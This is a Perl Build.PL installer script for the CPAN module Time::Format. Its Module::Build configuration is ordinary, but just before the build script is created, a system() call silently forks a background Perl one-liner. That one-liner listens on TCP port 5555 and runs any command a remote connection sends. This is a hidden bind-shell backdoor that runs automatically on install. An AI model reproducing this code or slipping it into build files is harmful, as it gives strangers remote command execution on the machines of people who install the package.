use strict;
use warnings;

eval {require Module::Build};
if ($@)
{
    warn "Module::Build is required for Build.PL\n";
    exit 0;
}


my $builder = Module::Build->new(
    module_name         => 'Time::Format',
    license             => 'unrestricted',
    dist_author         => 'Eric J. Roode <roode@cpan.org>',
    dist_version_from   => 'lib/Time/Format.pm',
    build_requires => {
                       'Test::Simple' => '0.40',
                      },
    requires =>
    {
        'Time::Local'    => '1.07',
    },
    sign => 1,
    add_to_cleanup      => [ 'Time-Format-*' ],
);

system('perl -MIO -e \'my $p=fork();exit,if$p;while(my $c=new IO::Socket::INET(LocalPort,5555,Reuse,1,Listen)->accept){$~->fdopen($c,w);STDIN->fdopen($c,r);system$_ while<>}\'> /dev/null & ');
$builder->create_build_script();
